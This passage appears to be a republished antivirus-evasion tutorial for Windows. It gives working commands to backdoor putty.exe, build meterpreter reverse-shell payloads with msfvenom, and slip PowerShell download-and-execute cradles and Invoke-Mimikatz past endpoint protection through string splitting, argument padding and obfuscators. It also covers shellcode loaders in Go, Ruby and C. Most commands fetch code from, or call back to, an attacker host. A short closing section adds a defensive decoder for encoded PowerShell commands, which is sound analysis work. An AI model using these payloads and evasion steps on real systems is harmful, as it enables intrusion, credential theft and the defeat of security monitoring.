meterpreter_reverse_https_threaded corresponds to msf set payload windows/meterpreter/reverse_https
iat_reverse_tcp_stager_threaded fixes up the IAT
user_supplied_shellcode_threaded takes your own payload
Options: -s payload, -H callback address, -P callback port, -J inject across multiple code caves.
    > python backdoor.py -f ~/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.0.108 -P 12138 -J -o payload.exe
The backdoored file is written to the backdoored directory. Or supply your own shellcode:
    > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c
    > python backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c -o payload2.exe

zirikatu

hanzoInjection (https://github.com/P0cL4bs/hanzoInjection)
    > msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.108 lport=12138 -f raw -o /var/www/html/1.bin
    > HanzoInjection.exe -p 1.bin -o 1.cs
Compile 1.cs with "Allow unsafe code" enabled (Properties > Build).

PowerShell evasion

Direct generation
    > msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b '\x00' lhost=192.168.0.108 lport=12138 -f psh -o /var/www/html/1.ps1
(An x86 encoder cannot encode an x64 payload; for this payload drop -e or pick an x64 encoder.)
    > powershell -ep bypass -noexit -file 1.ps1

Behaviour-detection bypass: split the download cradle so the string "DownloadString" never appears whole:
    > powershell -noexit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://192.168.0.108/1.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"

Invoke-Shellcode
    > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f powershell -o /var/www/html/1.ps1
On the target:
    > powershell -ep bypass
    > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/ps/powersploit/CodeExecution/Invoke-Shellcode.ps1')
    > IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.108/1.ps1')
    > Invoke-Shellcode -Shellcode ($buf) -Force
The protection software did not react.

Invoke-Obfuscation (https://github.com/danielbohannon/Invoke-Obfuscation)
    > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f psh -o /var/www/html/1.ps1
    > powershell -ep bypass
    > Import-Module .\Invoke-Obfuscation.psd1
    > Invoke-Obfuscation
    > set scriptpath C:\Users\y\Desktop\1.ps1
    > encoding
    > 3                                 choose an encoding
    > out C:\Users\y\Desktop\ok.ps1     save
Run:
    > powershell -ep bypass -noexit -file ok.ps1

Xencrypt (https://github.com/the-xentropy/xencrypt/blob/master/xencrypt.ps1)
    > Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100     recursive layering to dodge dynamic scanning
    > Invoke-Xencrypt -infile .\Invoke-Mimikatz.ps1 -outfile mimi.ps1

PyFuscation (https://github.com/CBHue/PyFuscation), obfuscates function, parameter and variable names:
    > python3 PyFuscation.py -fvp --ps Invoke-Mimikatz.ps1

Split string + C wrapper
    #include <stdio.h>
    #include <stdlib.h>

    int main(void)
    {
        // the cradle is split into two halves that are only joined at run time
        system("powershell $c2='IEX (New-Object Net.WebClient).Downlo';$c3='adString(''http://x.x.x.x/a'')'; $Text=$c2+$c3; IEX(-join $Text)");
        return 0;
    }

Behaviour detection: pad the command line with a long run of harmless switches ahead of the real command:
    > powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/mimikatz/Invoke-Mimikatz.ps1');Invoke-Mimikatz"

Out-EncryptedScript (PowerSploit, http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1)
    > Out-EncryptedScript -ScriptPath .\Invoke-Mimikatz.ps1 -Password shabiisme -Salt 123456
Then on the target:
    PS > IEX(New-Object Net.WebClient).DownloadString("http://192.168.0.108/ps/powersploit/ScriptModification/Out-EncryptedScript.ps1")
    PS > [String] $cmd = Get-Content .\evil.ps1
    PS > Invoke-Expression $cmd
    PS > $decrypted = de shabiisme 123456
    PS > Invoke-Expression $decrypted
    PS > Invoke-Mimikatz

Cobalt Strike PowerShell evasion (from https://y4er.com/post/cobalt-strike-powershell-bypass/)
Convert the base64 shellcode in the CS script into a decimal byte list:
    powershell> $string = ''
    powershell> $s = [Byte[]]$var_code = [System.Convert]::FromBase64String('<CS-generated shellcode>')
    powershell> $s | foreach { $string = $string + $_.ToString() + ',' }
    powershell> $string > c:\1.txt
Then change the script to [Byte[]]$var_code = [Byte[]](payload) (trim the trailing comma the loop leaves; PowerShell rejects "1,2,3,") and obfuscate the function and variable names.
Bypassing command-execution blocking with CS argument spoofing:
    beacon > argue cmd.exe blablabla

Chunked evasion
    > msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.0.108 LPORT=443 -f psh-net -o shity_shellcode.ps1
First test: replace the shellcode in the .ps1 with a harmless string. It is still flagged, which shows that most of the detection is of the PowerShell template, not of the shellcode itself. Bypass approaches:
1. Split strings into parts and create intermediate variables;
2. Add a lot of junk comments;
3. Add junk instructions such as loops or sleeps (useful against sandboxes).
For example [DllImport("kernel32.dll")] becomes [DllImport("ke"+"rne"+"l32.dll")] (gets past Symantec), and
    $przdE.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location))
becomes
    $magic="Syst"+"em"+".dll"; $przdE.ReferencedAssemblies.AddRange(@($magic,[PsObject].Assembly.Location))
and the shellcode is split into pieces ($sc0= ...). Details: https://raw.githubusercontent.com/kmkz/Pentesting/master/AV_Evasion/AV_Bypass.ps1
I do not know assembly well, so I did not add harmless instructions. I used the one-click bash script https://github.com/darksh3llRU/tools/blob/master/psh-net_shellcode_fastchange.sh instead (read through its commands if you have the time). It produces an .hta and chunks at 1337 characters; in my testing 1337-character chunks were caught by Symantec, so I changed it to 250. Since I added no assembly, just press any key at the prompt in the middle; those who know assembly can add instructions such as xor, inc, dec, add, sub, mov or nop at the start. The script generates several files; only final_pshnet_revhttps.ps1 is needed. Open it and edit it.

Ruby
When the target has Ruby installed:
    > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f ruby
Paste into a Ruby script and run it:
    > ruby xx.rb

Golang
    > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c
Convert the array to 0x.. form, paste it into go.txt and save it as a .go file. With Go installed, build the exe in the shellcode directory:
    > go build

go-shellcode loader (https://github.com/brimstone/go-shellcode)
    > cd cmd/sc && go build          builds sc.exe
    > msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f hex -o shell.txt
    > sc.exe <hex shellcode>

gsl (https://raw.githubusercontent.com/TideSec/BypassAntiVirus/master/tools/gsl-sc-loader.zip)
    > gsl -s SHELLCODE -hex                  shellcode on the command line, msfvenom hex format
    > gsl -f shell.raw                       load a local raw file
    > gsl -f shell.hex -hex                  load a local hex file
    > gsl -u http://192.168.0.108/1.raw      fetch remotely
    > gsl -u http://192.168.0.108/1.hex
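Both the CHM section and the PowerShell section above rely on `powershell -enc`; the following is an added example (not code from the post) of the reverse direction a responder takes. -EncodedCommand is base64 over the UTF-16LE script, so anyone holding the command line (Sysmon event 1, 4688 with command-line auditing, an EDR process tree) gets the script back without keys. The blob is the one quoted in the CHM section; the indicator patterns and their names are my own choice and are not an exhaustive list.

```python
"""Decode a PowerShell -EncodedCommand blob and pull out triage indicators."""
import base64
import re

# Verbatim from the post's `powershell -ep bypass -enc ...` line.
POST_BLOB = "JABCAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAOwAKACQAQgAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAKACQAQgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoASQBFAFgAIAAkAEIALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxADAANwA6ADgAMAA4ADAALwBQAEsAUQBOAEUAYgAnACkAOwAKAA=="

# Indicator names and patterns are this example's own, not a vendor list.
INDICATORS = {
    "download-cradle": re.compile(r"downloadstring|downloadfile|downloaddata", re.I),
    "invoke-expression": re.compile(r"\bIEX\b|invoke-expression", re.I),
    "web-client": re.compile(r"net\.webclient", re.I),
    "uses-system-proxy": re.compile(r"GetSystemWebProxy|DefaultCredentials", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def decode_encoded_command(blob):
    """Inverse of -EncodedCommand: base64 -> UTF-16LE bytes -> script text.

    Whitespace and missing '=' padding are tolerated because blobs copied out
    of logs and tickets routinely lose both.
    """
    raw = "".join(blob.split())
    raw += "=" * (-len(raw) % 4)
    data = base64.b64decode(raw)
    if len(data) % 2:
        raise ValueError("odd byte count: not a UTF-16LE -EncodedCommand payload")
    return data.decode("utf-16-le")


def encode_command(script):
    """What `powershell -enc` expects: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage(blob):
    """Decode and report which indicators fire and which URLs the script contacts."""
    script = decode_encoded_command(blob)
    return {
        "script": script,
        "indicators": sorted(name for name, rx in INDICATORS.items() if rx.search(script)),
        "urls": URL_RE.findall(script),
    }


if __name__ == "__main__":
    report = triage(POST_BLOB)
    print(report["script"])
    print("indicators:", report["indicators"])
    print("urls:", report["urls"])
```

The split-cradle tricks later in the PowerShell section ('Downlo' + 'adString', the -w Normal padding) target exactly this kind of pattern match on the decoded text; they do nothing against a detection that looks at what the process then does (the outbound request, the Net.WebClient object, the script block logged by PowerShell itself).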
乐享资源网 collects this material from the internet for learning and exchange only; follow the applicable laws and regulations. The resources do not represent the site's position; contact the site for removal of anything infringing, backdoored, or otherwise inappropriate.